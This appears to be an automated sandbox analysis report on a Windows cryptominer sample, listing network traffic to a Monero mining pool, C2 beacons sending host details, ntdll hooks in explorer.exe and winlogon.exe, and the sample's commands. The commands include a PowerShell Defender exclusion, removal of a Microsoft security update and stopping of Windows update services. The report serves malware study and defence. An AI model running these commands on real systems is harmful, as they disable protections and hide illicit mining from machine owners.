                                                                    Nov 5, 2024 12:24:48.261867046 CET2012849842149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:48.262068987 CET4984220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:48.262362957 CET4984220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:48.269052982 CET2012849842149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:49.102545977 CET2012849842149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:49.102709055 CET2012849842149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:49.102761030 CET4984220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:49.103343964 CET4984220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:49.109137058 CET2012849842149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:49.353240967 CET2012849842149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:49.353609085 CET4984220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:49.359262943 CET2012849842149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:49.359328985 CET4984220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:55.301744938 CET4988320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:55.306911945 CET2012849883149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:55.306988001 CET4988320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:55.312835932 CET4988320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:55.317986965 CET2012849883149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:56.146508932 CET2012849883149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:56.146632910 CET2012849883149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:56.146779060 CET4988320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:56.147486925 CET4988320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:56.152379990 CET2012849883149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:56.395859003 CET2012849883149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:56.400327921 CET4988320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:24:56.405597925 CET2012849883149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:24:56.405657053 CET4988320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:02.411859989 CET4992420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:02.416785955 CET2012849924149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:02.416857958 CET4992420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:02.422960997 CET4992420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:02.427788019 CET2012849924149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:03.289887905 CET2012849924149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:03.289948940 CET2012849924149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:03.289994001 CET4992420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:03.290585995 CET4992420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:03.295461893 CET2012849924149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:03.545599937 CET2012849924149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:03.545891047 CET4992420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:03.551172018 CET2012849924149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:03.551220894 CET4992420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:09.782488108 CET4996420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:09.787404060 CET2012849964149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:09.787468910 CET4996420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:09.787713051 CET4996420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:09.792581081 CET2012849964149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:10.640218019 CET2012849964149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:10.640311956 CET2012849964149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:10.640480042 CET4996420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:10.641038895 CET4996420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:10.646545887 CET2012849964149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:10.890160084 CET2012849964149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:10.890520096 CET4996420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:10.896025896 CET2012849964149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:10.896081924 CET4996420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:16.833117008 CET4997420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:16.838103056 CET2012849974149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:16.838197947 CET4997420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:16.844208002 CET4997420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:16.849060059 CET2012849974149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:17.692908049 CET2012849974149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:17.693028927 CET2012849974149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:17.693197966 CET4997420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:17.693702936 CET4997420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:17.698506117 CET2012849974149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:17.944886923 CET2012849974149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:17.945139885 CET4997420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:17.953366995 CET2012849974149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:17.953474045 CET4997420128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:23.895343065 CET4998220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:23.900543928 CET2012849982149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:23.900624990 CET4998220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:23.906418085 CET4998220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:23.911390066 CET2012849982149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:24.730736017 CET2012849982149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:24.730889082 CET2012849982149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:24.731050014 CET4998220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:24.731539965 CET4998220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:24.736660004 CET2012849982149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:24.974877119 CET2012849982149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:24.975294113 CET4998220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:24.981029034 CET2012849982149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:24.981076002 CET4998220128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:30.957976103 CET4998320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:30.963073969 CET2012849983149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:30.963169098 CET4998320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:30.969985008 CET4998320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:30.974888086 CET2012849983149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:31.810724020 CET2012849983149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:31.810776949 CET2012849983149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:31.810823917 CET4998320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:31.812794924 CET4998320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:31.817667007 CET2012849983149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:32.062922001 CET2012849983149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:32.063199997 CET4998320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:32.070151091 CET2012849983149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:32.070219994 CET4998320128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:34.985620022 CET4998480192.168.2.9162.230.48.189
                                                                    Nov 5, 2024 12:25:34.990863085 CET8049984162.230.48.189192.168.2.9
                                                                    Nov 5, 2024 12:25:34.991059065 CET4998480192.168.2.9162.230.48.189
                                                                    Nov 5, 2024 12:25:34.991242886 CET4998480192.168.2.9162.230.48.189
                                                                    Nov 5, 2024 12:25:34.996016979 CET8049984162.230.48.189192.168.2.9
                                                                    Nov 5, 2024 12:25:34.996090889 CET4998480192.168.2.9162.230.48.189
                                                                    Nov 5, 2024 12:25:35.001034021 CET8049984162.230.48.189192.168.2.9
                                                                    Nov 5, 2024 12:25:35.976833105 CET8049984162.230.48.189192.168.2.9
                                                                    Nov 5, 2024 12:25:35.977062941 CET4998480192.168.2.9162.230.48.189
                                                                    Nov 5, 2024 12:25:35.982671022 CET8049984162.230.48.189192.168.2.9
                                                                    Nov 5, 2024 12:25:35.982738972 CET4998480192.168.2.9162.230.48.189
                                                                    Nov 5, 2024 12:25:51.722842932 CET4998520128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:51.727720976 CET2012849985149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:51.727797985 CET4998520128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:51.728032112 CET4998520128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:51.732819080 CET2012849985149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:52.574556112 CET2012849985149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:52.574630976 CET2012849985149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:52.574830055 CET4998520128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:52.575376987 CET4998520128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:52.580169916 CET2012849985149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:52.826481104 CET2012849985149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:52.830904007 CET4998520128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:25:52.836220980 CET2012849985149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:25:52.836271048 CET4998520128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:10.536220074 CET4998620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:10.541222095 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:10.541315079 CET4998620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:30.088690042 CET4998620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:30.122559071 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:30.368482113 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:30.368712902 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:30.368891001 CET4998620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:30.369327068 CET4998620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:30.374243975 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:30.629476070 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:30.630374908 CET4998620128192.168.2.9149.102.143.109
                                                                    Nov 5, 2024 12:26:30.635612011 CET2012849986149.102.143.109192.168.2.9
                                                                    Nov 5, 2024 12:26:30.635667086 CET4998620128192.168.2.9149.102.143.109

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 5, 2024 12:24:34.048630953 CET6302253192.168.2.91.1.1.1
                                                                    Nov 5, 2024 12:24:34.058034897 CET53630221.1.1.1192.168.2.9

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Nov 5, 2024 12:24:34.048630953 CET192.168.2.91.1.1.10x14baStandard query (0)gulf.moneroocean.streamA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Nov 5, 2024 12:24:21.823111057 CET1.1.1.1192.168.2.90x3e94No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                    Nov 5, 2024 12:24:21.823111057 CET1.1.1.1192.168.2.90x3e94No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Nov 5, 2024 12:24:21.823111057 CET1.1.1.1192.168.2.90x3e94No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                    Nov 5, 2024 12:24:34.058034897 CET1.1.1.1192.168.2.90x14baNo error (0)gulf.moneroocean.streammonerooceans.streamCNAME (Canonical name)IN (0x0001)false
                                                                    Nov 5, 2024 12:24:34.058034897 CET1.1.1.1192.168.2.90x14baNo error (0)monerooceans.stream149.102.143.109A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • 162.230.48.189

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.949768162.230.48.189805568C:\Windows\System32\dialer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 5, 2024 12:24:35.054439068 CET174OUTPOST /api/endpoint.php HTTP/1.1
                                                                    Accept: */*
                                                                    Connection: close
                                                                    Content-Length: 283
                                                                    Content-Type: application/json
                                                                    Host: 162.230.48.189
                                                                    User-Agent: cpp-httplib/0.12.6
                                                                    Nov 5, 2024 12:24:35.059917927 CET283OUTData Raw: 7b 22 69 64 22 3a 22 69 68 6d 79 70 69 73 65 74 78 64 72 71 65 7a 65 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 33 37 36 34 38 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 4f 35 38 43 45 59
                                                                    Data Ascii: {"id":"ihmypisetxdrqeze","computername":"376483","username":"SYSTEM","gpu":"O58CEYKSL","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System
                                                                    Nov 5, 2024 12:24:36.140078068 CET267INHTTP/1.1 200 OK
                                                                    Date: Tue, 05 Nov 2024 11:24:32 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                    X-Robots-Tag: noindex, nofollow
                                                                    X-Powered-By: PHP/8.0.30
                                                                    Content-Length: 17
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d
                                                                    Data Ascii: {"response":"ok"}


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.949984162.230.48.189805568C:\Windows\System32\dialer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 5, 2024 12:25:34.991242886 CET174OUTPOST /api/endpoint.php HTTP/1.1
                                                                    Accept: */*
                                                                    Connection: close
                                                                    Content-Length: 284
                                                                    Content-Type: application/json
                                                                    Host: 162.230.48.189
                                                                    User-Agent: cpp-httplib/0.12.6
                                                                    Nov 5, 2024 12:25:34.996090889 CET284OUTData Raw: 7b 22 69 64 22 3a 22 69 68 6d 79 70 69 73 65 74 78 64 72 71 65 7a 65 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 33 37 36 34 38 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 4f 35 38 43 45 59
                                                                    Data Ascii: {"id":"ihmypisetxdrqeze","computername":"376483","username":"SYSTEM","gpu":"O58CEYKSL","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System
                                                                    Nov 5, 2024 12:25:35.976833105 CET251INHTTP/1.1 200 OK
                                                                    Date: Tue, 05 Nov 2024 11:25:32 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                    X-Robots-Tag: noindex, nofollow
                                                                    X-Powered-By: PHP/8.0.30
                                                                    Content-Length: 2
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Data Raw: 7b 7d
                                                                    Data Ascii: {}


                                                                    Code Manipulations

                                                                    User Modules

                                                                    Hook Summary

                                                                    Function NameHook TypeActive in Processes
                                                                    ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                    NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                    ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                    NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                    ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                    NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                    NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                    ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                    ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                    NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                    RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                                    NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                    NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                    ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                    ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                                    Processes

                                                                    Process: explorer.exe, Module: ntdll.dll
                                                                    Function NameHook TypeNew Data
                                                                    ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                    NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                    ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                    NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                    ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                    NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                    NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                    ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                    ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                    NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                    RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                    NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                    NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                    ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                    ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                    Process: winlogon.exe, Module: ntdll.dll
                                                                    Function NameHook TypeNew Data
                                                                    ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                    NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                    ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                    NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                    ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                    NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                    NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                    ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                    ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                    NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                    RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                    NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                    NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                    ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                    ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:06:24:23
                                                                    Start date:05/11/2024
                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                    Imagebase:0x7ff6f1d40000
                                                                    File size:5'511'680 bytes
                                                                    MD5 hash:73A56908097EE57DD4217877AEAE4641
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:2
                                                                    Start time:06:24:24
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                    Imagebase:0x7ff760310000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:06:24:24
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:06:24:27
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                    Imagebase:0x7ff652a00000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:06:24:27
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:7
                                                                    Start time:06:24:27
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:06:24:27
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:9
                                                                    Start time:06:24:27
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\wusa.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                    Imagebase:0x7ff7e7830000
                                                                    File size:345'088 bytes
                                                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:10
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:11
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:12
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:13
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:14
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop bits
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:15
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
